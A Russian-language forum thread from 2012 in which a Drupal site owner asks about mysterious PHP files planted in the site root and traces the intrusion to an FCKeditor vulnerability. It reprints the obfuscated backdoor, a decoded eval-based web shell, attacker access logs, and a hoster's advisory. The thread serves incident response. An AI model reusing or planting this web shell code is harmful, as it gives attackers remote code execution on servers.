27 сентября 2012 в 18:05
В корне сайта обнаружены посторонние фалы php с разными названиями. Например wtm7991n.php.
фалы удалял, сменил пароли ftp, какое-то время не было. Сегодня опять появился посторонний файл.
Что делает этот код и где искать уязвимость?
Содержимое файла
<?php$d=substr(8,1);foreach(array(36,112,61,64,36,95,80,79,83,84,91,39,112,49,39,93,59,36,109,61,115,112,114,105,110,116,102,40,34,37,99,34,44,57,50,41,59,105,102,40,115,116,114,112,111,115,40,36,112,44,34,36,109,36,109,34,41,41,123,36,112,61,115,116,114,105,112,115,108,97,115,104,101,115,40,36,112,41,59,125,111,98,95,115,116,97,114,116,40,41,59,101,118,97,108,40,36,112,41,59,36,116,101,109,112,61,34,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,105,110,110,101,114,72,84,77,76,61,39,34,46,97,100,100,99,115,108,97,115,104,101,115,40,104,116,109,108,115,112,101,99,105,97,108,99,104,97,114,115,40,111,98,95,103,101,116,95,99,108,101,97,110,40,41,41,44,34,92,110,92,114,92,116,92,92,39,92,48,34,41,46,34,39,59,92,110,34,59,101,99,104,111,40,115,116,114,108,101,110,40,36,116,101,109,112,41,46,34,92,110,34,46,36,116,101,109,112,41,59,101,120,105,116,59)as$c){$d.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$c);}eval($d);exit; ?>
Комментарии
Поздравляю, это взлом
Забавный код))
Запускает вот этот PHP скрипт:
<?php
$p=@$_POST['p1'];
$m=sprintf("%c",92);
if(strpos($p,"$m$m")){$p=stripslashes($p);}
ob_start();
eval($p);
$temp="document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
echo(strlen($temp)."\n".$temp);
exit;
?>
Версия ядра последняя? Я бы его еще принудительно обновил, а то мало ли, может еще пара сюрпризов в ядре теперь сидит.
обновил ядро до 6.26
машину проверил антивирусом,
пароли ftp сменил и в клиенте на храню
пароль админа сменил
где уязвимость есть идеи?
обновил ядро до 6.26
машину проверил антивирусом,
пароли ftp сменил и в клиенте на храню
пароль админа сменил
где уязвимость есть идеи?
смотрите логи, кто создал файл.
Судя по логам уязвимость не в ftp. Кроме меня никто не заходил и подобные файлы не закачивал.
Если я правильно мыслю уязвимость надо искать либо в ядре, либо более вероятно - в модулях?
Файл wtm2973n.php, время создания 07.10.2012, 15:28:01.
к файлу обращаются с одного ip: 81.163.156.195
вот логи за сегодня с этого ip:
81.163.156.195 - - [07/Oct/2012:16:27:59 +0400] "POST /?q=fckeditor%2Fxss HTTP/1.1" 200 4 "-" "-"
81.163.156.195 - - [07/Oct/2012:16:28:01 +0400] "GET /wtm2973n.php HTTP/1.1" 200 109 "-" "-"
81.163.156.195 - - [07/Oct/2012:17:10:04 +0400] "POST /wtm2973n.php?showimg=1&cookies=1 HTTP/1.1" 200 84 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8"
в первой записи упоминается fckeditor. Это и есть источник уязвимости?
Если Друпал развернут правильно, создать с помощью друпал эти файлы технически невозможно, у него просто нет на это прав. Обычно подобное можно совершить сперев пароль от FTP или SSH, ибо для остального обычно нет доступа, но все равно, проверьте права доступа ко всем папкам, хотя на сколько помню, друпал обычно ругается, если у него есть доступ куда не надо.
Ну и кроме FTP нужно посмотреть и логи SSH
Такое возможно если доступ настроен неверно и библиотеку брали не из официальных источников(именно логическое И)
Компы, с которых производиться вход по FTP,SSH,в админку хостинга, тоже стоит проверить...
на джумле у меня половина скриптов была заражена троянами. менял пароли, скрипты перезаливал. через время опять тоже самое. оказалось, что у другой стороны, которая имела аккаунт в админке и доступ к серверу компьютер был заражен вирусами.
Мой товарищ обнаружил такой же код примерно в конце сентября. А я у себя сегодня... Версия друпал 6. Пытаемся вылечиться
Уязвимость наиболее вероятно в fckeditor. В сети полно информации об этой уязвимости в старых версиях - возможность загружать и исполнять произвольные файлы.
На эксперименты времени нет. Поэтому пока обновил fckeditor до последней версии и заблокировал в .htaccess ip, с которого обращались к зараженным файлам.
Двое суток - пока взлома нет. Ранее почти каждый день приходилось удалять файлы, а на следующий день они появлялись опять.
Находил тему, что на сайтах на bitrix`е тоже находили такой кусок кода. Видмо действительно взлом происходит не через ядро друпал.
Вся соль в том, что при корректных настройках доступа, даже если дать права администратора 3му лицу на сам сайт, никаких файлов за пределами, например, sites/default/files/ никаким кодом создать не получится, можете поэкспериментировать - попробуйте создать файл средствами php в корне сайта, если получится - значит доступ настроен через одно место. С 7м ядром по сложнее, т.к. оно имеет доступ за пределы "рабочих" папок средствами ftp
История повторяется.
в корень сайта размещают php файлы зараженные, по мнению AVG трояном.
Обновления не помогли. Блокировка ip тоже. Через неделю атака продолжилась с другого ip той же подсети. Пока заблокировал подсеть. Но это не решение.
Пароли ftp неоднократно менял, машину на вирусы проверял.
Есть идеи?
в логах первые обращения с данного ip
81.163.142.21 - - [18/Oct/2012:19:46:55 +0400] "POST /?q=fckeditor%2Fxss HTTP/1.1" 200 4 "-" "-"
81.163.142.21 - - [18/Oct/2012:19:46:56 +0400] "GET /wtm3543n.php HTTP/1.1" 200 109 "-" "-"
затем появляется
81.163.142.21 - - [19/Oct/2012:01:09:17 +0400] "POST /wtm3543n.php?cookies=1&showimg=1&truecss=1&t2122n=1 HTTP/1.1" 200 1123 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET4.0C; .NET4.0E)"
81.163.142.21 - - [19/Oct/2012:01:09:17 +0400] "GET /wp-conf.php?t6157n=1& HTTP/1.1" 200 24976 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET4.0C; .NET4.0E)"
wp-conf.php заражен.
что означает первая запись?
81.163.135.47 - - [09/Oct/2012:22:17:44 +0400] "POST /?q=fckeditor%2Fxss HTTP/1.1" 200 4 "-" "-"
Примерно 11 числа я почистил свои сайты, и сегодня-вчера файлы снова появились.
При том у меня заражены два сайта, никак не связанные, и храняться на разном хостинге. Оба сайта на друпал 6.
*
чисти компьютеры редакторов и модеров сайта, а так же свой
ибо так если подумать...два разных сайт на разных хостингах именно у тебя подвергаются вирусной атаке.....
Я бы даже сказал более, у пользователя jeweller, я так понимаю твориться тоже самое, И (!) у нас это происходит в одно время, у меня тоже второе заражение было 18 октября.
В продолжение и завершение темы.
Другой не зараженный аккаунт находится на it patrol.
От них получил сообщение.
«Уважаемые клиенты.
В последнее время на сайтах наших клиентов были зафиксированы многочисленные внедрения шелл-скриптов, с помощью которых злоумышленники делали спам-рассылки. Мы провели анализ и выяснили, что хакеры используют различные уязвимости в модулях FCKeditor (все версии), и CKEditor(CKEditor 6.x-1.x версий до 6.x-1.9, CKEditor 7.x-1.x версий до 7.x-1.7). С помощью данных уязвимостей злоумышленник может запускать произвольные сценарии на стороне клиента, а также исполнять сторонний PHP-код(если включен модуль PHP Filter) на стороне сервера.
Более подробно о данных уязвимостях можно почитать в issue на drupal.org и статье Уязвимости в CKEditor и FCKeditor.
В связи с указанной выше информацией мы настоятельно рекомендуем:
Если вы используете модуль FCKeditor - заменить его на CKEditor последней версии.
Если вы используете модуль CKEditor 6.x-1.x версий до 6.x-1.9 или CKEditor 7.x-1.x версий до 7.x-1.7 - обновить данный модуль до последней версии.
Со своей стороны мы работаем над тем, чтобы выявить и очистить уже зараженные аккаунты. Также наши администраторы занимаются очисткой очереди писем от спама, что может привести к тому, что некоторые не спам-письма могут быть удалены по ошибке.
Просим с пониманием отнестиcь к указанным выше рекомендациям и выполнить их как можно скорее.»
////////////
Уязвимые версии:
Drupal модуль FCKeditor 6.x-2.x версий до 6.x-2.3
Drupal модуль CKEditor 6.x-1.x версий до 6.x-1.9
Drupal модуль CKEditor 7.x-1.x версий до 7.x-1.7
Описание:
Обнаруженные уязвимости позволяют удаленному пользователю выполнить произвольный код на системе.
1. Уязвимость существует из-за недостаточной обработки определенных входных данных. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
2. Уязвимость существует из-за недостаточной обработки неизвестных входных данных. Удаленный пользователь может выполнить произвольный PHP код.
Примечание: Успешная эксплуатация уязвимости № 2 в FCKeditor 6.x требует наличия привилегий, а в CKEditor 6.x наличия привилегий access ckeditor
URL производителя: http://drupal.org/
Решение: Для устранения уязвимости установите исправления с сайта производителя.